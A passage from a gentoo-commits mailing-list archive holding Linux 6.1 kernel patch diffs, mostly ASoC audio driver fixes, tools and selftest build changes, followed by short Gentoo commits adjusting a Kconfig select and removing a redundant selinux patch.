+ 		ret = PTR_ERR(priv->cpu_mclk);
+ 		dev_err(&cpu_pdev->dev, "failed to get DAI mclk1: %d\n", ret);
+-		return -EINVAL;
++		return ret;
+ 	}
+ 
+ 	priv->audmix_pdev = audmix_pdev;
+diff --git a/sound/soc/fsl/imx-pcm-rpmsg.c b/sound/soc/fsl/imx-pcm-rpmsg.c
+index 35049043e5322..933bac7ea1864 100644
+--- a/sound/soc/fsl/imx-pcm-rpmsg.c
++++ b/sound/soc/fsl/imx-pcm-rpmsg.c
+@@ -19,6 +19,7 @@
+ static struct snd_pcm_hardware imx_rpmsg_pcm_hardware = {
+ 	.info = SNDRV_PCM_INFO_INTERLEAVED |
+ 		SNDRV_PCM_INFO_BLOCK_TRANSFER |
++		SNDRV_PCM_INFO_BATCH |
+ 		SNDRV_PCM_INFO_MMAP |
+ 		SNDRV_PCM_INFO_MMAP_VALID |
+ 		SNDRV_PCM_INFO_NO_PERIOD_WAKEUP |
+diff --git a/sound/soc/fsl/imx-rpmsg.c b/sound/soc/fsl/imx-rpmsg.c
+index 4d99f4858a14f..76c6febf24990 100644
+--- a/sound/soc/fsl/imx-rpmsg.c
++++ b/sound/soc/fsl/imx-rpmsg.c
+@@ -88,6 +88,14 @@ static int imx_rpmsg_probe(struct platform_device *pdev)
+ 			    SND_SOC_DAIFMT_NB_NF |
+ 			    SND_SOC_DAIFMT_CBC_CFC;
+ 
++	/*
++	 * i.MX rpmsg sound cards work in codec slave mode. MCLK is disabled
++	 * by the CPU DAI driver in hw_free(), but some codecs require MCLK
++	 * during the power up/down sequence. Set ignore_pmdown_time so the
++	 * codec powers down immediately, before MCLK is turned off.
++	 */
++	data->dai.ignore_pmdown_time = 1;
++
+ 	/* Optional codec node */
+ 	ret = of_parse_phandle_with_fixed_args(np, "audio-codec", 0, 0, &args);
+ 	if (ret) {
+diff --git a/sound/soc/intel/avs/boards/hdaudio.c b/sound/soc/intel/avs/boards/hdaudio.c
+index 073663ba140d0..a65939f30ac47 100644
+--- a/sound/soc/intel/avs/boards/hdaudio.c
++++ b/sound/soc/intel/avs/boards/hdaudio.c
+@@ -54,6 +54,9 @@ static int avs_create_dai_links(struct device *dev, struct hda_codec *codec, int
+ 			return -ENOMEM;
+ 
+ 		dl[i].codecs->name = devm_kstrdup(dev, cname, GFP_KERNEL);
++		if (!dl[i].codecs->name)
++			return -ENOMEM;
++
+ 		dl[i].codecs->dai_name = pcm->name;
+ 		dl[i].num_codecs = 1;
+ 		dl[i].num_cpus = 1;
+diff --git a/sound/soc/meson/axg-spdifin.c b/sound/soc/meson/axg-spdifin.c
+index e2cc4c4be7586..97e81ec4a78ce 100644
+--- a/sound/soc/meson/axg-spdifin.c
++++ b/sound/soc/meson/axg-spdifin.c
+@@ -112,34 +112,6 @@ static int axg_spdifin_prepare(struct snd_pcm_substream *substream,
+ 	return 0;
+ }
+ 
+-static int axg_spdifin_startup(struct snd_pcm_substream *substream,
+-			       struct snd_soc_dai *dai)
+-{
+-	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+-	int ret;
+-
+-	ret = clk_prepare_enable(priv->refclk);
+-	if (ret) {
+-		dev_err(dai->dev,
+-			"failed to enable spdifin reference clock\n");
+-		return ret;
+-	}
+-
+-	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN,
+-			   SPDIFIN_CTRL0_EN);
+-
+-	return 0;
+-}
+-
+-static void axg_spdifin_shutdown(struct snd_pcm_substream *substream,
+-				 struct snd_soc_dai *dai)
+-{
+-	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+-
+-	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN, 0);
+-	clk_disable_unprepare(priv->refclk);
+-}
+-
+ static void axg_spdifin_write_mode_param(struct regmap *map, int mode,
+ 					 unsigned int val,
+ 					 unsigned int num_per_reg,
+@@ -251,25 +223,38 @@ static int axg_spdifin_dai_probe(struct snd_soc_dai *dai)
+ 	ret = axg_spdifin_sample_mode_config(dai, priv);
+ 	if (ret) {
+ 		dev_err(dai->dev, "mode configuration failed\n");
+-		clk_disable_unprepare(priv->pclk);
+-		return ret;
++		goto pclk_err;
+ 	}
+ 
++	ret = clk_prepare_enable(priv->refclk);
++	if (ret) {
++		dev_err(dai->dev,
++			"failed to enable spdifin reference clock\n");
++		goto pclk_err;
++	}
++
++	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN,
++			   SPDIFIN_CTRL0_EN);
++
+ 	return 0;
++
++pclk_err:
++	clk_disable_unprepare(priv->pclk);
++	return ret;
+ }
+ 
+ static int axg_spdifin_dai_remove(struct snd_soc_dai *dai)
+ {
+ 	struct axg_spdifin *priv = snd_soc_dai_get_drvdata(dai);
+ 
++	regmap_update_bits(priv->map, SPDIFIN_CTRL0, SPDIFIN_CTRL0_EN, 0);
++	clk_disable_unprepare(priv->refclk);
+ 	clk_disable_unprepare(priv->pclk);
+ 	return 0;
+ }
+ 
+ static const struct snd_soc_dai_ops axg_spdifin_ops = {
+ 	.prepare	= axg_spdifin_prepare,
+-	.startup	= axg_spdifin_startup,
+-	.shutdown	= axg_spdifin_shutdown,
+ };
+ 
+ static int axg_spdifin_iec958_info(struct snd_kcontrol *kcontrol,
+diff --git a/sound/soc/sof/core.c b/sound/soc/sof/core.c
+index 75a1e2c6539f2..eaa16755a2704 100644
+--- a/sound/soc/sof/core.c
++++ b/sound/soc/sof/core.c
+@@ -461,10 +461,9 @@ int snd_sof_device_remove(struct device *dev)
+ 		snd_sof_ipc_free(sdev);
+ 		snd_sof_free_debug(sdev);
+ 		snd_sof_remove(sdev);
++		sof_ops_free(sdev);
+ 	}
+ 
+-	sof_ops_free(sdev);
+-
+ 	/* release firmware */
+ 	snd_sof_fw_unload(sdev);
+ 
+diff --git a/sound/soc/sof/intel/mtl.c b/sound/soc/sof/intel/mtl.c
+index 10298532816fe..d7048f1d6a048 100644
+--- a/sound/soc/sof/intel/mtl.c
++++ b/sound/soc/sof/intel/mtl.c
+@@ -453,7 +453,7 @@ static int mtl_dsp_cl_init(struct snd_sof_dev *sdev, int stream_tag, bool imr_bo
+ 	/* step 3: wait for IPC DONE bit from ROM */
+ 	ret = snd_sof_dsp_read_poll_timeout(sdev, HDA_DSP_BAR, chip->ipc_ack, status,
+ 					    ((status & chip->ipc_ack_mask) == chip->ipc_ack_mask),
+-					    HDA_DSP_REG_POLL_INTERVAL_US, MTL_DSP_PURGE_TIMEOUT_US);
++					    HDA_DSP_REG_POLL_INTERVAL_US, HDA_DSP_INIT_TIMEOUT_US);
+ 	if (ret < 0) {
+ 		if (hda->boot_iteration == HDA_FW_BOOT_ATTEMPTS)
+ 			dev_err(sdev->dev, "timeout waiting for purge IPC done\n");
+diff --git a/sound/soc/sof/intel/mtl.h b/sound/soc/sof/intel/mtl.h
+index 788bf0e3ea879..00e3526889d3d 100644
+--- a/sound/soc/sof/intel/mtl.h
++++ b/sound/soc/sof/intel/mtl.h
+@@ -54,7 +54,6 @@
+ #define MTL_DSP_IRQSTS_IPC		BIT(0)
+ #define MTL_DSP_IRQSTS_SDW		BIT(6)
+ 
+-#define MTL_DSP_PURGE_TIMEOUT_US	20000000 /* 20s */
+ #define MTL_DSP_REG_POLL_INTERVAL_US	10	/* 10 us */
+ 
+ /* Memory windows */
+diff --git a/tools/include/linux/btf_ids.h b/tools/include/linux/btf_ids.h
+index 71e54b1e37964..2f882d5cb30f5 100644
+--- a/tools/include/linux/btf_ids.h
++++ b/tools/include/linux/btf_ids.h
+@@ -38,7 +38,7 @@ asm(							\
+ 	____BTF_ID(symbol)
+ 
+ #define __ID(prefix) \
+-	__PASTE(prefix, __COUNTER__)
++	__PASTE(__PASTE(prefix, __COUNTER__), __LINE__)
+ 
+ /*
+  * The BTF_ID defines unique symbol for each ID pointing
+diff --git a/tools/include/linux/mm.h b/tools/include/linux/mm.h
+index a03d9bba51514..43be27bcc897d 100644
+--- a/tools/include/linux/mm.h
++++ b/tools/include/linux/mm.h
+@@ -11,8 +11,6 @@
+ 
+ #define PHYS_ADDR_MAX	(~(phys_addr_t)0)
+ 
+-#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
+-#define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+ #define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+ #define ALIGN_DOWN(x, a)		__ALIGN_KERNEL((x) - ((a) - 1), (a))
+ 
+diff --git a/tools/include/linux/seq_file.h b/tools/include/linux/seq_file.h
+index 102fd9217f1f9..f6bc226af0c1d 100644
+--- a/tools/include/linux/seq_file.h
++++ b/tools/include/linux/seq_file.h
+@@ -1,4 +1,6 @@
+ #ifndef _TOOLS_INCLUDE_LINUX_SEQ_FILE_H
+ #define _TOOLS_INCLUDE_LINUX_SEQ_FILE_H
+ 
++struct seq_file;
++
+ #endif /* _TOOLS_INCLUDE_LINUX_SEQ_FILE_H */
+diff --git a/tools/include/uapi/linux/bpf.h b/tools/include/uapi/linux/bpf.h
+index 51b9aa640ad2a..53bc487947197 100644
+--- a/tools/include/uapi/linux/bpf.h
++++ b/tools/include/uapi/linux/bpf.h
+@@ -1837,7 +1837,9 @@ union bpf_attr {
+  * 		performed again, if the helper is used in combination with
+  * 		direct packet access.
+  * 	Return
+- * 		0 on success, or a negative error in case of failure.
++ * 		0 on success, or a negative error in case of failure. A positive
++ * 		return value indicates a potential drop or congestion in the
++ * 		target device. The particular positive error codes are not defined.
+  *
+  * u64 bpf_get_current_pid_tgid(void)
+  * 	Description
+diff --git a/tools/perf/util/Build b/tools/perf/util/Build
+index e315ecaec3233..2c364a9087a22 100644
+--- a/tools/perf/util/Build
++++ b/tools/perf/util/Build
+@@ -276,6 +276,12 @@ ifeq ($(BISON_GE_35),1)
+ else
+   bison_flags += -w
+ endif
++
++BISON_LT_381 := $(shell expr $(shell $(BISON) --version | grep bison | sed -e 's/.\+ \([0-9]\+\).\([0-9]\+\).\([0-9]\+\)/\1\2\3/g') \< 381)
++ifeq ($(BISON_LT_381),1)
++  bison_flags += -DYYNOMEM=YYABORT
++endif
++
+ CFLAGS_parse-events-bison.o += $(bison_flags)
+ CFLAGS_pmu-bison.o          += -DYYLTYPE_IS_TRIVIAL=0 $(bison_flags)
+ CFLAGS_expr-bison.o         += -DYYLTYPE_IS_TRIVIAL=0 $(bison_flags)
+diff --git a/tools/testing/memblock/tests/basic_api.c b/tools/testing/memblock/tests/basic_api.c
+index a13a57ba0815f..7ce628e31a431 100644
+--- a/tools/testing/memblock/tests/basic_api.c
++++ b/tools/testing/memblock/tests/basic_api.c
+@@ -1,7 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0-or-later
++#include "basic_api.h"
+ #include <string.h>
+ #include <linux/memblock.h>
+-#include "basic_api.h"
+ 
+ #define EXPECTED_MEMBLOCK_REGIONS			128
+ #define FUNC_ADD					"memblock_add"
+diff --git a/tools/testing/memblock/tests/common.h b/tools/testing/memblock/tests/common.h
+index d6bbbe63bfc36..4c33ce04c0645 100644
+--- a/tools/testing/memblock/tests/common.h
++++ b/tools/testing/memblock/tests/common.h
+@@ -5,6 +5,7 @@
+ #include <stdlib.h>
+ #include <assert.h>
+ #include <linux/types.h>
++#include <linux/seq_file.h>
+ #include <linux/memblock.h>
+ #include <linux/sizes.h>
+ #include <linux/printk.h>
+diff --git a/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc b/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
+index 0eb47fbb3f44d..42422e4251078 100644
+--- a/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
++++ b/tools/testing/selftests/ftrace/test.d/instances/instance-event.tc
+@@ -39,7 +39,7 @@ instance_read() {
+ 
+ instance_set() {
+         while :; do
+-                echo 1 > foo/events/sched/sched_switch
++                echo 1 > foo/events/sched/sched_switch/enable
+         done 2> /dev/null
+ }
+ 
+diff --git a/tools/testing/selftests/kselftest_deps.sh b/tools/testing/selftests/kselftest_deps.sh
+index 708cb54296336..47a1281a3b702 100755
+--- a/tools/testing/selftests/kselftest_deps.sh
++++ b/tools/testing/selftests/kselftest_deps.sh
+@@ -46,11 +46,11 @@ fi
+ print_targets=0
+ 
+ while getopts "p" arg; do
+-    case $arg in
+-        p)
++	case $arg in
++		p)
+ 		print_targets=1
+ 	shift;;
+-    esac
++	esac
+ done
+ 
+ if [ $# -eq 0 ]
+@@ -92,6 +92,10 @@ pass_cnt=0
+ # Get all TARGETS from selftests Makefile
+ targets=$(egrep "^TARGETS +|^TARGETS =" Makefile | cut -d "=" -f2)
+ 
++# Initially, in LDLIBS related lines, the dep checker needs
++# to ignore lines containing the following strings:
++filter="\$(VAR_LDLIBS)\|pkg-config\|PKG_CONFIG\|IOURING_EXTRA_LIBS"
++
+ # Single test case
+ if [ $# -eq 2 ]
+ then
+@@ -100,6 +104,8 @@ then
+ 	l1_test $test
+ 	l2_test $test
+ 	l3_test $test
++	l4_test $test
++	l5_test $test
+ 
+ 	print_results $1 $2
+ 	exit $?
+@@ -113,7 +119,7 @@ fi
+ # Append space at the end of the list to append more tests.
+ 
+ l1_tests=$(grep -r --include=Makefile "^LDLIBS" | \
+-		grep -v "VAR_LDLIBS" | awk -F: '{print $1}')
++		grep -v "$filter" | awk -F: '{print $1}' | uniq)
+ 
+ # Level 2: LDLIBS set dynamically.
+ #
+@@ -126,7 +132,7 @@ l1_tests=$(grep -r --include=Makefile "^LDLIBS" | \
+ # Append space at the end of the list to append more tests.
+ 
+ l2_tests=$(grep -r --include=Makefile ": LDLIBS" | \
+-		grep -v "VAR_LDLIBS" | awk -F: '{print $1}')
++		grep -v "$filter" | awk -F: '{print $1}' | uniq)
+ 
+ # Level 3
+ # memfd and others use pkg-config to find mount and fuse libs
+@@ -138,11 +144,32 @@ l2_tests=$(grep -r --include=Makefile ": LDLIBS" | \
+ #	VAR_LDLIBS := $(shell pkg-config fuse --libs 2>/dev/null)
+ 
+ l3_tests=$(grep -r --include=Makefile "^VAR_LDLIBS" | \
+-		grep -v "pkg-config" | awk -F: '{print $1}')
++		grep -v "pkg-config\|PKG_CONFIG" | awk -F: '{print $1}' | uniq)
+ 
+-#echo $l1_tests
+-#echo $l2_1_tests
+-#echo $l3_tests
++# Level 4
++# some tests may fall back to default using `|| echo -l<libname>`
++# if pkg-config doesn't find the libs, instead of using VAR_LDLIBS
++# as per level 3 checks.
++# e.g:
++# netfilter/Makefile
++#	LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++l4_tests=$(grep -r --include=Makefile "^LDLIBS" | \
++		grep "pkg-config\|PKG_CONFIG" | awk -F: '{print $1}' | uniq)
++
++# Level 5
++# some tests may use IOURING_EXTRA_LIBS to add extra libs to LDLIBS,
++# which in turn may be defined in a sub-Makefile
++# e.g.:
++# mm/Makefile
++#	$(OUTPUT)/gup_longterm: LDLIBS += $(IOURING_EXTRA_LIBS)
++l5_tests=$(grep -r --include=Makefile "LDLIBS +=.*\$(IOURING_EXTRA_LIBS)" | \
++	awk -F: '{print $1}' | uniq)
++
++#echo l1_tests $l1_tests
++#echo l2_tests $l2_tests
++#echo l3_tests $l3_tests
++#echo l4_tests $l4_tests
++#echo l5_tests $l5_tests
+ 
+ all_tests
+ print_results $1 $2
+@@ -164,24 +191,32 @@ all_tests()
+ 	for test in $l3_tests; do
+ 		l3_test $test
+ 	done
++
++	for test in $l4_tests; do
++		l4_test $test
++	done
++
++	for test in $l5_tests; do
++		l5_test $test
++	done
+ }
+ 
+ # Use same parsing used for l1_tests and pick libraries this time.
+ l1_test()
+ {
+ 	test_libs=$(grep --include=Makefile "^LDLIBS" $test | \
+-			grep -v "VAR_LDLIBS" | \
++			grep -v "$filter" | \
+ 			sed -e 's/\:/ /' | \
+ 			sed -e 's/+/ /' | cut -d "=" -f 2)
+ 
+ 	check_libs $test $test_libs
+ }
+ 
+-# Use same parsing used for l2__tests and pick libraries this time.
++# Use same parsing used for l2_tests and pick libraries this time.
+ l2_test()
+ {
+ 	test_libs=$(grep --include=Makefile ": LDLIBS" $test | \
+-			grep -v "VAR_LDLIBS" | \
++			grep -v "$filter" | \
+ 			sed -e 's/\:/ /' | sed -e 's/+/ /' | \
+ 			cut -d "=" -f 2)
+ 
+@@ -197,6 +232,24 @@ l3_test()
+ 	check_libs $test $test_libs
+ }
+ 
++l4_test()
++{
++	test_libs=$(grep --include=Makefile "^VAR_LDLIBS\|^LDLIBS" $test | \
++			grep "\(pkg-config\|PKG_CONFIG\).*|| echo " | \
++			sed -e 's/.*|| echo //' | sed -e 's/)$//')
++
++	check_libs $test $test_libs
++}
++
++l5_test()
++{
++	tests=$(find $(dirname "$test") -type f -name "*.mk")
++	test_libs=$(grep "^IOURING_EXTRA_LIBS +\?=" $tests | \
++			cut -d "=" -f 2)
++
++	check_libs $test $test_libs
++}
++
+ check_libs()
+ {
+ 
+diff --git a/tools/testing/selftests/net/tls.c b/tools/testing/selftests/net/tls.c
+index c0ad8385441f2..5b80fb155d549 100644
+--- a/tools/testing/selftests/net/tls.c
++++ b/tools/testing/selftests/net/tls.c
+@@ -551,11 +551,11 @@ TEST_F(tls, sendmsg_large)
+ 
+ 		msg.msg_iov = &vec;
+ 		msg.msg_iovlen = 1;
+-		EXPECT_EQ(sendmsg(self->cfd, &msg, 0), send_len);
++		EXPECT_EQ(sendmsg(self->fd, &msg, 0), send_len);
+ 	}
+ 
+ 	while (recvs++ < sends) {
+-		EXPECT_NE(recv(self->fd, mem, send_len, 0), -1);
++		EXPECT_NE(recv(self->cfd, mem, send_len, 0), -1);
+ 	}
+ 
+ 	free(mem);
+@@ -584,9 +584,9 @@ TEST_F(tls, sendmsg_multiple)
+ 	msg.msg_iov = vec;
+ 	msg.msg_iovlen = iov_len;
+ 
+-	EXPECT_EQ(sendmsg(self->cfd, &msg, 0), total_len);
++	EXPECT_EQ(sendmsg(self->fd, &msg, 0), total_len);
+ 	buf = malloc(total_len);
+-	EXPECT_NE(recv(self->fd, buf, total_len, 0), -1);
++	EXPECT_NE(recv(self->cfd, buf, total_len, 0), -1);
+ 	for (i = 0; i < iov_len; i++) {
+ 		EXPECT_EQ(memcmp(test_strs[i], buf + len_cmp,
+ 				 strlen(test_strs[i])),
+diff --git a/tools/testing/selftests/powerpc/Makefile b/tools/testing/selftests/powerpc/Makefile
+index 6ba95cd19e423..c8c085fa05b05 100644
+--- a/tools/testing/selftests/powerpc/Makefile
++++ b/tools/testing/selftests/powerpc/Makefile
+@@ -45,28 +45,27 @@ $(SUB_DIRS):
+ include ../lib.mk
+ 
+ override define RUN_TESTS
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests;\
+ 	done;
+ endef
+ 
+ override define INSTALL_RULE
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install;\
+ 	done;
+ endef
+ 
+-override define EMIT_TESTS
+-	@for TARGET in $(SUB_DIRS); do \
++emit_tests:
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+-		$(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests;\
++		$(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET $@;\
+ 	done;
+-endef
+ 
+ override define CLEAN
+-	@for TARGET in $(SUB_DIRS); do \
++	+@for TARGET in $(SUB_DIRS); do \
+ 		BUILD_TARGET=$(OUTPUT)/$$TARGET;	\
+ 		$(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean; \
+ 	done;
+@@ -76,4 +75,4 @@ endef
+ tags:
+ 	find . -name '*.c' -o -name '*.h' | xargs ctags
+ 
+-.PHONY: tags $(SUB_DIRS)
++.PHONY: tags $(SUB_DIRS) emit_tests
+diff --git a/tools/testing/selftests/powerpc/pmu/Makefile b/tools/testing/selftests/powerpc/pmu/Makefile
+index 30803353bd7cc..a284fa874a9f1 100644
+--- a/tools/testing/selftests/powerpc/pmu/Makefile
++++ b/tools/testing/selftests/powerpc/pmu/Makefile
+@@ -25,32 +25,36 @@ $(OUTPUT)/per_event_excludes: ../utils.c
+ DEFAULT_RUN_TESTS := $(RUN_TESTS)
+ override define RUN_TESTS
+ 	$(DEFAULT_RUN_TESTS)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET run_tests
+ endef
+ 
+-DEFAULT_EMIT_TESTS := $(EMIT_TESTS)
+-override define EMIT_TESTS
+-	$(DEFAULT_EMIT_TESTS)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+-endef
++emit_tests:
++	for TEST in $(TEST_GEN_PROGS); do \
++		BASENAME_TEST=`basename $$TEST`;	\
++		echo "$(COLLECTION):$$BASENAME_TEST";	\
++	done
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -s -C $$TARGET emit_tests
+ 
+ DEFAULT_INSTALL_RULE := $(INSTALL_RULE)
+ override define INSTALL_RULE
+ 	$(DEFAULT_INSTALL_RULE)
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET install
+ endef
+ 
+-clean:
++DEFAULT_CLEAN := $(CLEAN)
++override define CLEAN
++	$(DEFAULT_CLEAN)
+ 	$(RM) $(TEST_GEN_PROGS) $(OUTPUT)/loop.o
+-	TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
+-	TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
+-	TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=ebb; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=sampling_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++	+TARGET=event_code_tests; BUILD_TARGET=$$OUTPUT/$$TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -C $$TARGET clean
++endef
+ 
+ ebb:
+ 	TARGET=$@; BUILD_TARGET=$$OUTPUT/$$TARGET; mkdir -p $$BUILD_TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -k -C $$TARGET all
+@@ -61,4 +65,4 @@ sampling_tests:
+ event_code_tests:
+ 	TARGET=$@; BUILD_TARGET=$$OUTPUT/$$TARGET; mkdir -p $$BUILD_TARGET; $(MAKE) OUTPUT=$$BUILD_TARGET -k -C $$TARGET all
+ 
+-.PHONY: all run_tests clean ebb sampling_tests event_code_tests
++.PHONY: all run_tests ebb sampling_tests event_code_tests emit_tests


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-05 14:23 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-05 14:23 UTC (permalink / raw)
  To: gentoo-commits

commit:     b34204a3e7f9be1d039f1b914643e23ddb0166fa
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Oct  5 14:04:01 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Oct  5 14:23:39 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b34204a3

Select BLK_DEV_BSG only if SCSI is enabled, since BLK_DEV_BSG depends on it.

Thanks, Ancient.

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 4567_distro-Gentoo-Kconfig.patch | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/4567_distro-Gentoo-Kconfig.patch b/4567_distro-Gentoo-Kconfig.patch
index 9cb1eb0c..195c7d47 100644
--- a/4567_distro-Gentoo-Kconfig.patch
+++ b/4567_distro-Gentoo-Kconfig.patch
@@ -122,7 +122,7 @@
 +	depends on GENTOO_LINUX && GENTOO_LINUX_UDEV
 +
 +	select AUTOFS_FS
-+	select BLK_DEV_BSG
++	select BLK_DEV_BSG if SCSI
 +	select BPF_SYSCALL
 +	select CGROUP_BPF
 +	select CGROUPS
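
For context, a Kconfig "select" forces the chosen symbol on while ignoring
that symbol's own "depends on" constraints, so an unconditional select of
BLK_DEV_BSG can produce an "unmet direct dependencies" warning on kernels
configured without SCSI. A minimal Kconfig sketch of the semantics (the
GENTOO_LINUX_EXAMPLE symbol is an illustrative stand-in, not the real
symbol from 4567_distro-Gentoo-Kconfig.patch):

	# BLK_DEV_BSG is only valid together with SCSI:
	config BLK_DEV_BSG
		bool "/dev/bsg support (SG v4)"
		depends on SCSI

	config GENTOO_LINUX_EXAMPLE
		bool "Illustrative distro symbol"
		# A bare "select BLK_DEV_BSG" would force it on even with
		# SCSI=n; guarding the select applies it only when SCSI is set:
		select BLK_DEV_BSG if SCSI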


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-09-23 11:03 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-09-23 11:03 UTC (permalink / raw)
  To: gentoo-commits

commit:     5f0da340c312b96c5645d105e56a06674020ee3a
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Sep 23 11:03:17 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Sep 23 11:03:17 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=5f0da340

Remove redundant patch

Removed:
1515_selinux-fix-handling-of-empty-opts.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                   |  4 ---
 1515_selinux-fix-handling-of-empty-opts.patch | 51 ---------------------------
 2 files changed, 55 deletions(-)

diff --git a/0000_README b/0000_README
index 44dd3ca6..3723582e 100644
--- a/0000_README
+++ b/0000_README
@@ -271,10 +271,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1515_selinux-fix-handling-of-empty-opts.patch
-From:   https://www.spinics.net/lists/linux-fsdevel/msg249428.html
-Desc:   selinux: fix handling of empty opts in selinux_fs_context_submount()
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1515_selinux-fix-handling-of-empty-opts.patch b/1515_selinux-fix-handling-of-empty-opts.patch
deleted file mode 100644
index 10336ec5..00000000
--- a/1515_selinux-fix-handling-of-empty-opts.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-selinux: fix handling of empty opts in selinux_fs_context_submount()
-
